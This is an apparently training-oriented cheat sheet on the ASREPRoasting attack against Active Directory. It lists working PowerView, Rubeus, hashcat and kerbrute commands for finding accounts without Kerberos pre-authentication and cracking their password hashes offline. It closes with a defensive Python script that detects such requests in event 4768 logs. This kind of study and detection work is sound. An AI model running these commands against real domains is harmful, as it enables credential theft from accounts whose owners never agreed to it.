# ASREPRoasting

ASREPRoasting is an attack that exploits user accounts in Active Directory that have Kerberos pre-authentication disabled. This allows an attacker to retrieve encrypted Ticket Granting Ticket (TGT) data for such an account without knowing its password; the data can then be cracked offline to obtain the plaintext password.

### 1. Enumerate Users with Pre-Authentication Not Required

**Command:**

```
Get-DomainUser -PreauthNotRequired | select samaccountname,userprincipalname,useraccountcontrol | fl
```

**Description:** Uses the PowerView tool to search for user accounts in the target Windows domain that have the DONT\_REQ\_PREAUTH value set. Performed from a Windows-based host.

### 2. Perform ASREPRoasting Attack with Rubeus

**Command:**

```
.\Rubeus.exe asreproast /user:mmorgan /nowrap /format:hashcat
```

**Description:** Uses Rubeus to perform an ASREPRoasting attack and formats the output for Hashcat. Performed from a Windows-based host.

### 3. Crack Captured Hash with Hashcat

**Command:**

```
hashcat -m 18200 ilfreight_asrep /usr/share/wordlists/rockyou.txt
```

**Description:** Uses Hashcat to attempt to crack the captured ASREP hash using a wordlist (rockyou.txt). Performed from a Linux-based host.

### 4. Enumerate Users and Retrieve ASREP Hashes with Kerbrute

**Command:**

```
kerbrute userenum -d inlanefreight.local --dc 172.16.5.5 /opt/jsmith.txt
```

**Description:** Enumerates users in a target Windows domain and automatically retrieves ASREP hashes for any users that do not require Kerberos pre-authentication. Performed from a Linux-based host.
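
On the defensive side, a domain controller records a successful ticket request of this kind as Security event 4768 with a pre-authentication type of 0. The following is an added example, not part of the original page, that filters such events from a constructed JSON-lines export and groups the affected accounts by requesting host; the export layout, timestamps, source addresses and every account name other than mmorgan are assumptions.

```python
import json
from collections import defaultdict

# Constructed sample (not real log data): EventData fields of Security event
# 4768 (Kerberos TGT requested), one JSON object per line as a SIEM might export.
SAMPLE_4768 = """\
{"TimeCreated":"2024-05-01T09:14:02Z","TargetUserName":"jdoe","Status":"0x0","PreAuthType":"2","TicketEncryptionType":"0x12","IpAddress":"::ffff:172.16.5.40"}
{"TimeCreated":"2024-05-01T09:20:11Z","TargetUserName":"mmorgan","Status":"0x0","PreAuthType":"0","TicketEncryptionType":"0x17","IpAddress":"::ffff:172.16.5.225"}
{"TimeCreated":"2024-05-01T09:20:12Z","TargetUserName":"svc_legacy","Status":"0x0","PreAuthType":"0","TicketEncryptionType":"0x12","IpAddress":"::ffff:172.16.5.225"}
{"TimeCreated":"2024-05-01T09:20:12Z","TargetUserName":"nobody1","Status":"0x6","PreAuthType":"-","TicketEncryptionType":"0xffffffff","IpAddress":"::ffff:172.16.5.225"}
"""

RC4_HMAC = 0x17  # etype 23, the encryption type hashcat mode 18200 targets


def parse_events(text):
    """Parse the JSON-lines export into a list of event dicts."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def tgt_without_preauth(events):
    """Return successful TGT requests (Status 0x0) issued with PreAuthType 0."""
    hits = []
    for ev in events:
        # Failed requests and requests that did pre-authenticate are skipped.
        if int(ev["Status"], 16) != 0 or ev["PreAuthType"] != "0":
            continue
        hits.append({
            "time": ev["TimeCreated"],
            "account": ev["TargetUserName"],
            "source": ev["IpAddress"].replace("::ffff:", ""),
            "rc4": int(ev["TicketEncryptionType"], 16) == RC4_HMAC,
        })
    return hits


def by_source(hits):
    """Group affected accounts by requesting host. Several accounts from one
    host suggests a sweep rather than a single legacy client."""
    grouped = defaultdict(set)
    for h in hits:
        grouped[h["source"]].add(h["account"])
    return {src: sorted(accts) for src, accts in grouped.items()}


if __name__ == "__main__":
    hits = tgt_without_preauth(parse_events(SAMPLE_4768))
    for h in hits:
        print(h)
    print(by_source(hits))
```

Every account this reports is one with pre-authentication disabled, so the same output doubles as a list of accounts to review for re-enabling pre-authentication or rotating to a long random password.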
